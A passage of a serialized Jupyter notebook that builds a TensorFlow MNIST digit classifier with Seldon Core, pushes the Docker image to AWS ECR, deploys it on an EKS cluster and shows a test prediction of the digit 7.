"---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nRequirement already satisfied: tensorflow>=1.12.0 in /usr/local/lib/python3.6/site-packages (from -r requirements.txt (line 1)) (1.13.1)\nRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.0.9)\nRequirement already satisfied: gast>=0.2.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.2.2)\nRequirement already satisfied: absl-py>=0.1.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.7.1)\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.7.1)\nRequirement already satisfied: keras-applications>=1.0.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.0.7)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.12.0)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.1.0)\nRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.19.0)\nRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.33.1)\nRequirement already satisfied: tensorboard<1.14.0,>=1.13.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.13.1)\nRequirement already satisfied: numpy>=1.13.3 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.16.2)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (3.7.0)\nRequirement already satisfied: tensorflow-estimator<1.14.0rc0,>=1.13.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.13.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/site-packages (from keras-applications>=1.0.6->tensorflow>=1.12.0->-r requirements.txt (line 1)) (2.9.0)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/site-packages (from tensorboard<1.14.0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (3.0.1)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/site-packages (from tensorboard<1.14.0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.15.0)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from protobuf>=3.6.1->tensorflow>=1.12.0->-r requirements.txt (line 1)) (40.8.0)\nRequirement already satisfied: mock>=2.0.0 in /usr/local/lib/python3.6/site-packages (from tensorflow-estimator<1.14.0rc0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (2.0.0)\nRequirement already satisfied: pbr>=0.11 in /usr/local/lib/python3.6/site-packages (from mock>=2.0.0->tensorflow-estimator<1.14.0rc0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (5.1.3)\nUrl '/whl' is ignored. 
It is either a non-existing path or lacks a specific scheme.\nYou are using pip version 19.0.3, however version 19.1.1 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n"
]
],
[
[
"## 3) Send some data to the docker model to test it\nWe first run the docker image we just created as a container called \"mnist_predictor\"",
"_____no_output_____"
]
],
[
[
"!docker run --name \"mnist_predictor\" -d --rm -p 5000:5000 deep-mnist:0.1",
"5157ab4f516bd0dea11b159780f31121e9fb41df6394e0d6d631e6e0d572463b\r\n"
]
],
[
[
"Send some random features that conform to the contract",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n# This is the variable that was initialised at the beginning of the file\ni = [0]\nx = mnist.test.images[i]\ny = mnist.test.labels[i]\nplt.imshow(x.reshape((28, 28)), cmap='gray')\nplt.show()\nprint(\"Expected label: \", np.sum(range(0,10) * y), \". One hot encoding: \", y)",
"_____no_output_____"
],
[
"from seldon_core.seldon_client import SeldonClient\nimport math\nimport numpy as np\n\n# We now test the REST endpoint expecting the same result\nendpoint = \"0.0.0.0:5000\"\nbatch = x\npayload_type = \"ndarray\"\n\nsc = SeldonClient(microservice_endpoint=endpoint)\n\n# We use the microservice, instead of the \"predict\" function\nclient_prediction = sc.microservice(\n data=batch,\n method=\"predict\",\n payload_type=payload_type,\n names=[\"tfidf\"])\n\nfor proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):\n print(f\"LABEL {label}:\\t {proba.number_value*100:6.4f} %\")",
"LABEL 0:\t 0.0068 %\nLABEL 1:\t 0.0000 %\nLABEL 2:\t 0.0085 %\nLABEL 3:\t 0.3409 %\nLABEL 4:\t 0.0002 %\nLABEL 5:\t 0.0020 %\nLABEL 6:\t 0.0000 %\nLABEL 7:\t 99.5371 %\nLABEL 8:\t 0.0026 %\nLABEL 9:\t 0.1019 %\n"
],
[
"!docker rm mnist_predictor --force",
"mnist_predictor\r\n"
]
],
[
[
"## 4) Install and configure AWS tools to interact with AWS",
"_____no_output_____"
],
[
"First we install the awscli",
"_____no_output_____"
]
],
[
[
"!pip install awscli --upgrade --user",
"Collecting awscli\n Using cached https://files.pythonhosted.org/packages/f6/45/259a98719e7c7defc9be4cc00fbfb7ccf699fbd1f74455d8347d0ab0a1df/awscli-1.16.163-py2.py3-none-any.whl\nCollecting colorama<=0.3.9,>=0.2.5 (from awscli)\n Using cached https://files.pythonhosted.org/packages/db/c8/7dcf9dbcb22429512708fe3a547f8b6101c0d02137acbd892505aee57adf/colorama-0.3.9-py2.py3-none-any.whl\nCollecting PyYAML<=3.13,>=3.10 (from awscli)\nCollecting botocore==1.12.153 (from awscli)\n Using cached https://files.pythonhosted.org/packages/ec/3b/029218966ce62ae9824a18730de862ac8fc5a0e8083d07d1379815e7cca1/botocore-1.12.153-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: docutils>=0.10 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from awscli) (0.14)\nCollecting rsa<=3.5.0,>=3.1.2 (from awscli)\n Using cached https://files.pythonhosted.org/packages/e1/ae/baedc9cb175552e95f3395c43055a6a5e125ae4d48a1d7a924baca83e92e/rsa-3.4.2-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: s3transfer<0.3.0,>=0.2.0 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from awscli) (0.2.0)\nRequirement already satisfied, skipping upgrade: urllib3<1.25,>=1.20; python_version >= \"3.4\" in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (1.24.2)\nRequirement already satisfied, skipping upgrade: python-dateutil<3.0.0,>=2.1; python_version >= \"2.7\" in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (2.8.0)\nRequirement already satisfied, skipping upgrade: jmespath<1.0.0,>=0.7.1 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (0.9.4)\nCollecting pyasn1>=0.1.3 (from rsa<=3.5.0,>=3.1.2->awscli)\n Using cached https://files.pythonhosted.org/packages/7b/7c/c9386b82a25115cccf1903441bba3cbadcfae7b678a20167347fa8ded34c/pyasn1-0.4.5-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: six>=1.5 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from python-dateutil<3.0.0,>=2.1; python_version >= \"2.7\"->botocore==1.12.153->awscli) (1.12.0)\nInstalling collected packages: colorama, PyYAML, botocore, pyasn1, rsa, awscli\nSuccessfully installed PyYAML-3.13 awscli-1.16.163 botocore-1.12.153 colorama-0.3.9 pyasn1-0.4.5 rsa-3.4.2\n"
]
],
[
[
"#### Configure aws so it can talk to your server \n(if you are getting issues, make sure you have the permmissions to create clusters)",
"_____no_output_____"
]
],
[
[
"%%bash \n# You must make sure that the access key and secret are changed\naws configure << END_OF_INPUTS\nYOUR_ACCESS_KEY\nYOUR_ACCESS_SECRET\nus-west-2\njson\nEND_OF_INPUTS",
"AWS Access Key ID [****************SF4A]: AWS Secret Access Key [****************WLHu]: Default region name [eu-west-1]: Default output format [json]: "
]
],
[
[
"#### Install EKCTL\n*IMPORTANT*: These instructions are for linux\nPlease follow the official installation of ekctl at: https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html",
"_____no_output_____"
]
],
[
[
"!curl --silent --location \"https://github.com/weaveworks/eksctl/releases/download/latest_release/eksctl_$(uname -s)_amd64.tar.gz\" | tar xz ",
"_____no_output_____"
],
[
"!chmod 755 ./eksctl",
"_____no_output_____"
],
[
"!./eksctl version",
"\u001b[36m[ℹ] version.Info{BuiltAt:\"\", GitCommit:\"\", GitTag:\"0.1.32\"}\r\n\u001b[0m"
]
],
[
[
"## 5) Use the AWS tools to create and setup EKS cluster with Seldon\nIn this example we will create a cluster with 2 nodes, with a minimum of 1 and a max of 3. You can tweak this accordingly.\n\nIf you want to check the status of the deployment you can go to AWS CloudFormation or to the EKS dashboard.\n\nIt will take 10-15 minutes (so feel free to go grab a ☕). \n\n### IMPORTANT: If you get errors in this step...\nIt is most probably IAM role access requirements, which requires you to discuss with your administrator.",
"_____no_output_____"
]
],
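[
[
"The command in the next cell only pins the node count to 2; if you want the 1-to-3 node range mentioned above, eksctl also accepts explicit bounds via its `--nodes-min`/`--nodes-max` flags. This is a sketch rather than a command that was run in this notebook:\n\n```bash\n./eksctl create cluster \\\n    --name demo-eks-cluster \\\n    --region us-west-2 \\\n    --nodes 2 \\\n    --nodes-min 1 \\\n    --nodes-max 3\n```",
"_____no_output_____"
]
],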
[
[
"%%bash\n./eksctl create cluster \\\n--name demo-eks-cluster \\\n--region us-west-2 \\\n--nodes 2 ",
"Process is interrupted.\n"
]
],
[
[
"### Configure local kubectl \nWe want to now configure our local Kubectl so we can actually reach the cluster we've just created",
"_____no_output_____"
]
],
[
[
"!aws eks --region us-west-2 update-kubeconfig --name demo-eks-cluster",
"Updated context arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist in /home/alejandro/.kube/config\r\n"
]
],
[
[
"And we can check if the context has been added to kubectl config (contexts are basically the different k8s cluster connections)\nYou should be able to see the context as \"...aws:eks:eu-west-1:27...\". \nIf it's not activated you can activate that context with kubectlt config set-context <CONTEXT_NAME>",
"_____no_output_____"
]
],
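[
[
"For reference, switching the active context is a one-liner; `<CONTEXT_NAME>` is a placeholder for the ARN shown by `get-contexts` above:\n\n```bash\nkubectl config use-context <CONTEXT_NAME>\n```",
"_____no_output_____"
]
],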
[
[
"!kubectl config get-contexts",
"CURRENT NAME CLUSTER AUTHINFO NAMESPACE\r\n* arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist \r\n docker-desktop docker-desktop docker-desktop \r\n docker-for-desktop docker-desktop docker-desktop \r\n gke_ml-engineer_us-central1-a_security-cluster-1 gke_ml-engineer_us-central1-a_security-cluster-1 gke_ml-engineer_us-central1-a_security-cluster-1 \r\n"
]
],
[
[
"## Setup Seldon Core\n\nUse the setup notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).",
"_____no_output_____"
],
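[
"Before continuing, it can help to sanity-check the installation. The commands below assume Seldon Core was installed into the `seldon-system` namespace and Ambassador into the current namespace, as in the linked setup notebook; adjust the namespaces if yours differ:\n\n```bash\nkubectl get pods -n seldon-system\nkubectl get svc ambassador\n```",
"_____no_output_____"
],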
[
"## Push docker image\nIn order for the EKS seldon deployment to access the image we just built, we need to push it to the Elastic Container Registry (ECR).\n\nIf you have any issues please follow the official AWS documentation: https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-basics.html",
"_____no_output_____"
],
[
"### First we create a registry\nYou can run the following command, and then see the result at https://us-west-2.console.aws.amazon.com/ecr/repositories?#",
"_____no_output_____"
]
],
[
[
"!aws ecr create-repository --repository-name seldon-repository --region us-west-2",
"{\r\n \"repository\": {\r\n \"repositoryArn\": \"arn:aws:ecr:us-west-2:271049282727:repository/seldon-repository\",\r\n \"registryId\": \"271049282727\",\r\n \"repositoryName\": \"seldon-repository\",\r\n \"repositoryUri\": \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository\",\r\n \"createdAt\": 1558535798.0\r\n }\r\n}\r\n"
]
],
[
[
"### Now prepare docker image\nWe need to first tag the docker image before we can push it",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\ndocker tag deep-mnist:0.1 \"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository\"",
"_____no_output_____"
]
],
[
[
"### We now login to aws through docker so we can access the repository",
"_____no_output_____"
]
],
[
[
"!`aws ecr get-login --no-include-email --region us-west-2`",
"WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nWARNING! Your password will be stored unencrypted in /home/alejandro/.docker/config.json.\nConfigure a credential helper to remove this warning. See\nhttps://docs.docker.com/engine/reference/commandline/login/#credentials-store\n\nLogin Succeeded\n"
]
],
[
[
"### And push the image\nMake sure you add your AWS Account ID",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\ndocker push \"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository\"",
"The push refers to repository [271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository]\nf7d0d000c138: Preparing\n987f3f1afb00: Preparing\n00d16a381c47: Preparing\nbb01f50d544a: Preparing\nfcb82c6941b5: Preparing\n67290e35c458: Preparing\nb813745f5bb3: Preparing\nffecb18e9f0b: Preparing\nf50f856f49fa: Preparing\n80b43ad4adf9: Preparing\n14c77983a1cf: Preparing\na22a5ac18042: Preparing\n6257fa9f9597: Preparing\n578414b395b9: Preparing\nabc3250a6c7f: Preparing\n13d5529fd232: Preparing\n67290e35c458: Waiting\nb813745f5bb3: Waiting\nffecb18e9f0b: Waiting\nf50f856f49fa: Waiting\n80b43ad4adf9: Waiting\n6257fa9f9597: Waiting\n14c77983a1cf: Waiting\na22a5ac18042: Waiting\n578414b395b9: Waiting\nabc3250a6c7f: Waiting\n13d5529fd232: Waiting\n987f3f1afb00: Pushed\nfcb82c6941b5: Pushed\nbb01f50d544a: Pushed\nf7d0d000c138: Pushed\nffecb18e9f0b: Pushed\nb813745f5bb3: Pushed\nf50f856f49fa: Pushed\n67290e35c458: Pushed\n14c77983a1cf: Pushed\n578414b395b9: Pushed\n80b43ad4adf9: Pushed\n13d5529fd232: Pushed\n6257fa9f9597: Pushed\nabc3250a6c7f: Pushed\n00d16a381c47: Pushed\na22a5ac18042: Pushed\nlatest: digest: sha256:19aefaa9d87c1287eb46ec08f5d4f9a689744d9d0d0b75668b7d15e447819d74 size: 3691\n"
]
],
[
[
"## Running the Model\nWe will now run the model.\n\nLet's first have a look at the file we'll be using to trigger the model:",
"_____no_output_____"
]
],
[
[
"!cat deep_mnist.json",
"{\r\n \"apiVersion\": \"machinelearning.seldon.io/v1alpha2\",\r\n \"kind\": \"SeldonDeployment\",\r\n \"metadata\": {\r\n \"labels\": {\r\n \"app\": \"seldon\"\r\n },\r\n \"name\": \"deep-mnist\"\r\n },\r\n \"spec\": {\r\n \"annotations\": {\r\n \"project_name\": \"Tensorflow MNIST\",\r\n \"deployment_version\": \"v1\"\r\n },\r\n \"name\": \"deep-mnist\",\r\n \"oauth_key\": \"oauth-key\",\r\n \"oauth_secret\": \"oauth-secret\",\r\n \"predictors\": [\r\n {\r\n \"componentSpecs\": [{\r\n \"spec\": {\r\n \"containers\": [\r\n {\r\n \"image\": \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository:latest\",\r\n \"imagePullPolicy\": \"IfNotPresent\",\r\n \"name\": \"classifier\",\r\n \"resources\": {\r\n \"requests\": {\r\n \"memory\": \"1Mi\"\r\n }\r\n }\r\n }\r\n ],\r\n \"terminationGracePeriodSeconds\": 20\r\n }\r\n }],\r\n \"graph\": {\r\n \"children\": [],\r\n \"name\": \"classifier\",\r\n \"endpoint\": {\r\n\t\t\t\"type\" : \"REST\"\r\n\t\t },\r\n \"type\": \"MODEL\"\r\n },\r\n \"name\": \"single-model\",\r\n \"replicas\": 1,\r\n\t\t\"annotations\": {\r\n\t\t \"predictor_version\" : \"v1\"\r\n\t\t}\r\n }\r\n ]\r\n }\r\n}\r\n"
]
],
[
[
"Now let's trigger seldon to run the model.\n\nWe basically have a yaml file, where we want to replace the value \"REPLACE_FOR_IMAGE_AND_TAG\" for the image you pushed",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\nsed 's|REPLACE_FOR_IMAGE_AND_TAG|'\"$AWS_ACCOUNT_ID\"'.dkr.ecr.'\"$AWS_REGION\"'.amazonaws.com/seldon-repository|g' deep_mnist.json | kubectl apply -f -",
"error: unable to recognize \"STDIN\": Get https://461835FD3FF52848655C8F09FBF5EEAA.yl4.us-west-2.eks.amazonaws.com/api?timeout=32s: dial tcp: lookup 461835FD3FF52848655C8F09FBF5EEAA.yl4.us-west-2.eks.amazonaws.com on 1.1.1.1:53: no such host\n"
]
],
[
[
"And let's check that it's been created.\n\nYou should see an image called \"deep-mnist-single-model...\".\n\nWe'll wait until STATUS changes from \"ContainerCreating\" to \"Running\"",
"_____no_output_____"
]
],
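[
[
"If you prefer to block until the rollout completes instead of polling `get pods`, you can wait on the deployment Seldon created; the deployment name below is inferred from the pod name above (everything before the replica-set hash) and may differ in your cluster:\n\n```bash\nkubectl rollout status deployment/deep-mnist-single-model-42ed9d9\n```",
"_____no_output_____"
]
],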
[
[
"!kubectl get pods",
"NAME READY STATUS RESTARTS AGE\r\nambassador-5475779f98-7bhcw 1/1 Running 0 21m\r\nambassador-5475779f98-986g5 1/1 Running 0 21m\r\nambassador-5475779f98-zcd28 1/1 Running 0 21m\r\ndeep-mnist-single-model-42ed9d9-fdb557d6b-6xv2h 2/2 Running 0 18m\r\n"
]
],
[
[
"## Test the model\nNow we can test the model, let's first find out what is the URL that we'll have to use:",
"_____no_output_____"
]
],
[
[
"!kubectl get svc ambassador -o jsonpath='{.status.loadBalancer.ingress[0].hostname}' ",
"a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com"
]
],
[
[
"We'll use a random example from our dataset",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n# This is the variable that was initialised at the beginning of the file\ni = [0]\nx = mnist.test.images[i]\ny = mnist.test.labels[i]\nplt.imshow(x.reshape((28, 28)), cmap='gray')\nplt.show()\nprint(\"Expected label: \", np.sum(range(0,10) * y), \". One hot encoding: \", y)",
"_____no_output_____"
]
],
[
[
"We can now add the URL above to send our request:",
"_____no_output_____"
]
],
[
[
"from seldon_core.seldon_client import SeldonClient\nimport math\nimport numpy as np\n\nhost = \"a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com\"\nport = \"80\" # Make sure you use the port above\nbatch = x\npayload_type = \"ndarray\"\n\nsc = SeldonClient(\n gateway=\"ambassador\", \n ambassador_endpoint=host + \":\" + port,\n namespace=\"default\",\n oauth_key=\"oauth-key\", \n oauth_secret=\"oauth-secret\")\n\nclient_prediction = sc.predict(\n data=batch, \n deployment_name=\"deep-mnist\",\n names=[\"text\"],\n payload_type=payload_type)\n\nprint(client_prediction)",
"Success:True message:\nRequest:\ndata {\n names: \"text\"\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 
0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values 
[... request payload truncated: the remaining pixel number_value entries of the input image are omitted here ...]\n\nResponse:\nmeta {\n puid: \"l6bv1r38mmb32l0hbinln2jjcl\"\n requestPath {\n key: \"classifier\"\n value: \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository:latest\"\n }\n}\ndata {\n names: \"class:0\"\n names: \"class:1\"\n names: \"class:2\"\n names: \"class:3\"\n names: \"class:4\"\n names: \"class:5\"\n names: \"class:6\"\n names: \"class:7\"\n names: \"class:8\"\n names: \"class:9\"\n ndarray {\n values {\n list_value {\n values {\n number_value: 6.839015986770391e-05\n }\n values {\n number_value: 9.376968534979824e-09\n }\n values {\n number_value: 8.48581112222746e-05\n }\n values {\n number_value: 0.0034086888190358877\n }\n values {\n number_value: 2.3978568606253248e-06\n }\n values {\n number_value: 2.0100669644307345e-05\n }\n values {\n number_value: 3.0251623428512175e-08\n }\n values {\n number_value: 0.9953710436820984\n }\n values {\n number_value: 2.6070511012221687e-05\n }\n values {\n number_value: 0.0010185304563492537\n }\n }\n }\n }\n}\n\n"
]
],
[
[
"### Let's visualise the probability for each label\nIt seems that it correctly predicted the number 7",
"_____no_output_____"
]
],
[
[
"for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):\n print(f\"LABEL {label}:\\t {proba.number_value*100:6.4f} %\")",
"LABEL 0:\t 0.0068 %\nLABEL 1:\t 0.0000 %\nLABEL 2:\t 0.0085 %\nLABEL 3:\t 0.3409 %\nLABEL 4:\t 0.0002 %\nLABEL 5:\t 0.0020 %\nLABEL 6:\t 0.0000 %\nLABEL 7:\t 99.5371 %\nLABEL 8:\t 0.0026 %\nLABEL 9:\t 0.1019 %\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
